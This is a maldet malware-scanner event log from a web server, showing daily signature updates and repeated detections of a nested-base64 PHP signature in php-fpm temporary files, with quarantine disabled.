Jan 23 2026 03:51:21 web1 maldet(331490): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 23 2026 03:51:21 web1 maldet(331490): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 23 2026 03:51:21 web1 maldet(331490): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 23 2026 03:51:21 web1 maldet(331490): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 23 2026 03:51:52 web1 maldet(331490): {scan} file list completed in 31s, found 10890 files...
Jan 23 2026 03:51:52 web1 maldet(331490): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 23 2026 03:51:52 web1 maldet(331490): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (10890 files) in progress...
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971fe5013a74.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971fb8d831fa.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971fbea4e147.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971ff7108e2b.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_6973278a8f5de.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_6972f720380c5.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_697327be09195.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_69732490bb51b.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_697327f12615f.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971fe5013a74.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971fb8d831fa.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971fbea4e147.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971ff7108e2b.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_6973278a8f5de.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_6972f720380c5.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_697327be09195.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_69732490bb51b.php
Jan 23 2026 03:53:40 web1 maldet(331490): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_697327f12615f.php
Jan 23 2026 03:53:40 web1 maldet(331490): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 10890, malware hits 18, cleaned hits 0, time 140s
Jan 23 2026 03:53:40 web1 maldet(331490): {scan} scan report saved, to view run: maldet --report 260123-0351.331490
Jan 23 2026 03:53:40 web1 maldet(331490): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260123-0351.331490
Jan 24 2026 00:46:26 web1 maldet(1183): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 24 2026 04:00:41 web1 maldet(50070): {update} checking for available updates...
Jan 24 2026 04:00:41 web1 maldet(50070): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 24 2026 04:00:41 web1 maldet(50070): {update} hashing install files and checking against server...
Jan 24 2026 04:00:41 web1 maldet(50070): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 24 2026 04:00:41 web1 maldet(50070): {update} latest version already installed.
Jan 24 2026 04:00:41 web1 maldet(50179): {sigup} performing signature update check...
Jan 24 2026 04:00:41 web1 maldet(50179): {sigup} local signature set is version 202601222641432
Jan 24 2026 04:00:41 web1 maldet(50179): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 24 2026 04:00:41 web1 maldet(50179): {sigup} latest signature set already installed
Jan 24 2026 04:00:41 web1 maldet(50267): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 24 2026 04:00:41 web1 maldet(50267): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 24 2026 04:00:41 web1 maldet(50267): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 24 2026 04:00:41 web1 maldet(50267): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 24 2026 04:00:41 web1 maldet(50267): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 24 2026 04:01:15 web1 maldet(50267): {scan} file list completed in 34s, found 2436 files...
Jan 24 2026 04:01:15 web1 maldet(50267): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 24 2026 04:01:15 web1 maldet(50267): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (2436 files) in progress...
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_6974190e750f5.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_697450a1050a5.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_69738514cfabe.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_69741d6778c7d.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_697389fc18966.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_6973eac05e384.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_6974190e750f5.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_697450a1050a5.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_69738514cfabe.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_69741d6778c7d.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_697389fc18966.php
Jan 24 2026 04:01:52 web1 maldet(50267): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-152a624ba1274a96adbd1f60d9a7cf9a-ea-php83-php-fpm.service-WFY8Q1/tmp/run_6973eac05e384.php
Jan 24 2026 04:01:52 web1 maldet(50267): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 2436, malware hits 12, cleaned hits 0, time 71s
Jan 24 2026 04:01:52 web1 maldet(50267): {scan} scan report saved, to view run: maldet --report 260124-0400.50267
Jan 24 2026 04:01:52 web1 maldet(50267): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260124-0400.50267
Jan 25 2026 03:49:40 web1 maldet(444399): {update} checking for available updates...
Jan 25 2026 03:49:40 web1 maldet(444399): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 25 2026 03:49:40 web1 maldet(444399): {update} hashing install files and checking against server...
Jan 25 2026 03:49:40 web1 maldet(444399): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 25 2026 03:49:40 web1 maldet(444399): {update} latest version already installed.
Jan 25 2026 03:49:40 web1 maldet(444510): {sigup} performing signature update check...
Jan 25 2026 03:49:40 web1 maldet(444510): {sigup} local signature set is version 202601222641432
Jan 25 2026 03:49:40 web1 maldet(444510): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 25 2026 03:49:40 web1 maldet(444510): {sigup} new signature set 202601253611720 available
Jan 25 2026 03:49:40 web1 maldet(444510): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} verified md5sum of maldet-sigpack.tgz
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} unpacked and installed maldet-sigpack.tgz
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} verified md5sum of maldet-clean.tgz
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} unpacked and installed maldet-clean.tgz
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} signature set update completed
Jan 25 2026 03:49:41 web1 maldet(444510): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 25 2026 03:49:41 web1 maldet(444713): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 25 2026 03:49:42 web1 maldet(444713): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 25 2026 03:49:42 web1 maldet(444713): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 25 2026 03:49:42 web1 maldet(444713): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 25 2026 03:49:42 web1 maldet(444713): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 25 2026 03:50:19 web1 maldet(444713): {scan} file list completed in 37s, found 4505 files...
Jan 25 2026 03:50:19 web1 maldet(444713): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 25 2026 03:50:19 web1 maldet(444713): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (4505 files) in progress...
Jan 25 2026 03:51:52 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974defa1fdc7.php
Jan 25 2026 03:51:52 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975782d31284.php
Jan 25 2026 03:51:52 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697540b1c801c.php
Jan 25 2026 03:51:52 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974b3320f9b6.php
Jan 25 2026 03:51:52 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974b2bc432ed.php
Jan 25 2026 03:51:52 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975a92e54944.php
Jan 25 2026 03:51:52 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975d65ac3fba.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975da00e46f4.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697513cb41677.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974de33249a1.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974acd4b1855.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975d9c3c903b.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974ad770297c.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975d718c5b90.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974defa1fdc7.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975782d31284.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697540b1c801c.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974b3320f9b6.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974b2bc432ed.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975a92e54944.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975d65ac3fba.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975da00e46f4.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697513cb41677.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974de33249a1.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974acd4b1855.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975d9c3c903b.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6974ad770297c.php
Jan 25 2026 03:51:53 web1 maldet(444713): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6975d718c5b90.php
Jan 25 2026 03:51:53 web1 maldet(444713): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 4505, malware hits 28, cleaned hits 0, time 132s
Jan 25 2026 03:51:53 web1 maldet(444713): {scan} scan report saved, to view run: maldet --report 260125-0349.444713
Jan 25 2026 03:51:53 web1 maldet(444713): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260125-0349.444713
Jan 26 2026 04:55:24 web1 maldet(837573): {update} checking for available updates...
Jan 26 2026 04:55:25 web1 maldet(837573): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 26 2026 04:55:25 web1 maldet(837573): {update} hashing install files and checking against server...
Jan 26 2026 04:55:25 web1 maldet(837573): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 26 2026 04:55:25 web1 maldet(837573): {update} latest version already installed.
Jan 26 2026 04:55:25 web1 maldet(837682): {sigup} performing signature update check...
Jan 26 2026 04:55:25 web1 maldet(837682): {sigup} local signature set is version 202601253611720
Jan 26 2026 04:55:25 web1 maldet(837682): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 26 2026 04:55:25 web1 maldet(837682): {sigup} latest signature set already installed
Jan 26 2026 04:55:25 web1 maldet(837770): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 26 2026 04:55:25 web1 maldet(837770): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 26 2026 04:55:25 web1 maldet(837770): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 26 2026 04:55:25 web1 maldet(837770): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 26 2026 04:55:25 web1 maldet(837770): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 26 2026 04:55:56 web1 maldet(837770): {scan} file list completed in 31s, found 1089 files...
Jan 26 2026 04:55:56 web1 maldet(837770): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 26 2026 04:55:56 web1 maldet(837770): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (1089 files) in progress...
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6976fc247b5dc.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6976687b29eeb.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69769d17f1dba.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69763ceabd39e.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6976391ce5b1c.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6976fc6feb9cd.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69763d600d057.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69766c3acb8c0.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697734117500d.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697638ae2a53c.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6977008e31bd0.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69760c53048a0.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6976fc247b5dc.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6976687b29eeb.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69769d17f1dba.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69763ceabd39e.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6976391ce5b1c.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6976fc6feb9cd.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69763d600d057.php
